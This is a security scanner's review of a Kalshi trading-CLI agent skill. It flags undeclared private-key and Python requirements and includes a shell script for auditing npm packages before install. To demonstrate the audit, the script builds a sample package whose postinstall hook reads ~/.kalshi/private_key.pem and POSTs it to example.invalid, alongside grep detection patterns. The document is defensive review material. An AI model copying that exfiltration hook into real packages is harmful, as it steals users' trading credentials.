Skill v0.5.0

ClawScan security

Kalshi Agent · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Suspicious · Feb 11, 2026, 9:27 AM
Verdict
suspicious
Confidence
high
Model
gpt-5-mini
Summary
The skill's stated purpose (a Kalshi trading CLI) is plausible, but its manifest, runtime instructions, and install steps disagree in several places that should be cleared up before you install it or hand it credentials.
Guidance
Before installing, get clarification from the publisher about several mismatches:
1. Why do SKILL.md and the metadata list python3/pip and the Python 'cryptography' package when the tool is installed from npm?
2. SKILL.md and the install script expect an RSA private key at ~/.kalshi/private_key.pem, but that config path is not listed in the registry metadata. Confirm that this private key is required and understand how it is used.
Verify the kalshi-cli package source (the README points to a GitHub repo) and inspect its code for how it stores and transmits your access key and private key. Only install if you trust the kalshi-cli package owner. Generate and store the RSA private key securely (use a dedicated key, not one used elsewhere) and avoid pasting secrets into untrusted scripts. If you need this skill but cannot verify the source, request a version with a clear, auditable install spec (including any Python deps) and an explicit declaration of required files and credentials.
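The "inspect its code" step above can be made concrete. The script below is an added example, not part of the ClawScan report and not code from the kalshi-cli project: it triages an npm package that you have unpacked locally (with `npm pack`, which downloads the tarball without running its scripts) and reports the things a reviewer should read before the tool is allowed near KALSHI_ACCESS_KEY or ~/.kalshi/private_key.pem. The function names (audit_npm_pkg, report_matches, make_sample_pkg, make_clean_pkg), the grep patterns, and the two sample packages it builds in a temp directory are all assumptions of this example; the patterns are a heuristic starting point, not a complete detector, and the sample packages are constructed, not real kalshi-cli code.

```shell
#!/bin/sh
# Added example, not code from the ClawScan report or from the kalshi-cli project.
# Static triage of an npm package you have unpacked locally, run BEFORE
# `npm install -g` and before the tool ever sees KALSHI_ACCESS_KEY or
# ~/.kalshi/private_key.pem. Fetch and unpack the tarball without executing
# any of its scripts, then point the audit at the result:
#   npm pack kalshi-cli && tar xzf kalshi-cli-*.tgz   # unpacks into ./package
#   audit_npm_pkg ./package      # exit 0 = nothing flagged, 1 = findings to read
# The grep patterns below are a heuristic starting point (an assumption of this
# example, not a complete list); every hit still has to be read by a human.

# Print every source line under DIR matching PATTERN under a LABEL.
# Returns 0 if anything matched, 1 otherwise.
report_matches() {
    label="$1"; pattern="$2"; dir="$3"
    hits=$(find "$dir" -type f \( -name '*.js' -o -name '*.mjs' -o -name '*.cjs' \
                -o -name '*.ts' -o -name '*.sh' -o -name 'package.json' \) \
           -exec grep -nHE "$pattern" {} + 2>/dev/null || true)
    [ -n "$hits" ] || return 1
    echo "FINDING: $label"
    printf '%s\n' "$hits" | sed 's/^/    /'
    return 0
}

audit_npm_pkg() {
    dir="$1"; findings=0

    # 1. Lifecycle scripts execute automatically during `npm install`.
    report_matches "install-time lifecycle script (runs during npm install)" \
        '"(pre|post)?install"[[:space:]]*:' "$dir" && findings=1

    # 2. Every place the code touches the credentials this skill asks for.
    #    Informational: read each hit and follow where the value goes.
    report_matches "credential access (trace how each value is used)" \
        'private_key\.pem|KALSHI_ACCESS_KEY|\.kalshi/' "$dir" || true

    # 3. Outbound channels through which a private key could leave the machine.
    report_matches "network or process-spawning module" \
        'require\(.(https?|net|dgram|child_process).\)|from .(https?|net|dgram|child_process).|fetch\(' \
        "$dir" && findings=1

    # 4. Dynamic code execution hides behaviour from static review.
    report_matches "dynamic code execution" \
        '(^|[^A-Za-z0-9_])eval\(|new Function\(|vm\.run' "$dir" && findings=1

    # 5. Informational: compare each literal host with the documented Kalshi API
    #    endpoint and the repository URL the README points to.
    report_matches "hard-coded URL (compare against README and API docs)" \
        'https?://[A-Za-z0-9._-]+' "$dir" || true

    return "$findings"
}

# Constructed sample (NOT the real kalshi-cli) so the demonstration runs offline:
# a postinstall hook that reads the key file and POSTs it to an external host.
make_sample_pkg() {
    d=$(mktemp -d); mkdir -p "$d/package"
    cat > "$d/package/package.json" <<'EOF'
{ "name": "sample-cli", "version": "0.0.1",
  "scripts": { "postinstall": "node setup.js" } }
EOF
    cat > "$d/package/setup.js" <<'EOF'
const fs = require('fs');
const https = require('https');
const key = fs.readFileSync(process.env.HOME + '/.kalshi/private_key.pem');
https.request({ host: 'example.invalid', method: 'POST', path: '/' }).end(key);
EOF
    echo "$d/package"
}

# Constructed benign package for comparison.
make_clean_pkg() {
    d=$(mktemp -d); mkdir -p "$d/package"
    printf '{ "name": "clean-cli", "version": "0.0.1" }\n' > "$d/package/package.json"
    printf 'console.log("hello");\n' > "$d/package/index.js"
    echo "$d/package"
}

sample=$(make_sample_pkg)
echo "== auditing constructed sample at $sample =="
if audit_npm_pkg "$sample"; then
    echo "no blocking findings"
else
    echo "blocking findings present: read them before running npm install"
fi
rm -rf "$(dirname "$sample")"
```

On the constructed sample the audit flags the postinstall hook and the `https` import and lists the line that reads private_key.pem, which is exactly the combination the guidance above asks you to rule out. Two companion checks worth doing by hand: compare the `repository` field in the unpacked package.json (or `npm view kalshi-cli repository`) with the GitHub repo the README names, and, if you do go ahead, install with `npm install -g --ignore-scripts kalshi-cli` so that no lifecycle script runs before you have read it.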

Review Dimensions

Purpose & Capability
note
The skill claims to wrap the kalshi-cli tool to trade on Kalshi, which fits the stated purpose. However, the manifest and SKILL.md disagree about required artifacts: SKILL.md and install.sh require an RSA private key at ~/.kalshi/private_key.pem (used for signing), but the registry metadata lists no required config paths. The skill also declares Python requirements (python3, pip, and the Python package 'cryptography') while installation and the README center on an npm package (kalshi-cli). For the simple wrapper described, these mismatches are disproportionate and unexplained.
Instruction Scope
ok
The runtime instructions and README focus on installing the kalshi-cli npm package, placing a private RSA key in ~/.kalshi/private_key.pem, and setting KALSHI_ACCESS_KEY. They do not instruct the agent to read unrelated system files or to exfiltrate data. The instructions are concrete and limited to the Kalshi CLI's configuration and usage.
Install Mechanism
note
Installation (install.sh and the documentation) installs kalshi-cli via npm (npm install -g kalshi-cli), a standard registry install. No downloads from arbitrary URLs and no extract steps are used, which is expected for a CLI wrapper. However, the python3/pip and Python package declarations in SKILL.md are inconsistent with the npm-centric install and are not backed by any install step.
Credentials
concern
The registry lists a single required env var (KALSHI_ACCESS_KEY), which is appropriate for Kalshi access keys, but SKILL.md and install.sh also require a private RSA key file (~/.kalshi/private_key.pem). That file path is NOT declared in the registry metadata. Additionally, SKILL.md declares a Python package dependency ('cryptography>=41.0.0') even though no Python code is included. These unexplained credential and file requirements increase risk and should be justified by the publisher.
Persistence & Privilege
ok
The skill does not request 'always: true' and will not be force-included. install.sh writes a ~/.kalshi/.env file only if one does not already exist and prompts the user to place the private key in ~/.kalshi/private_key.pem; this is expected for a CLI that needs API keys configured. The skill does not modify other skills or system-wide configs beyond the user's home directory and a global npm install (which is normal for CLI tools).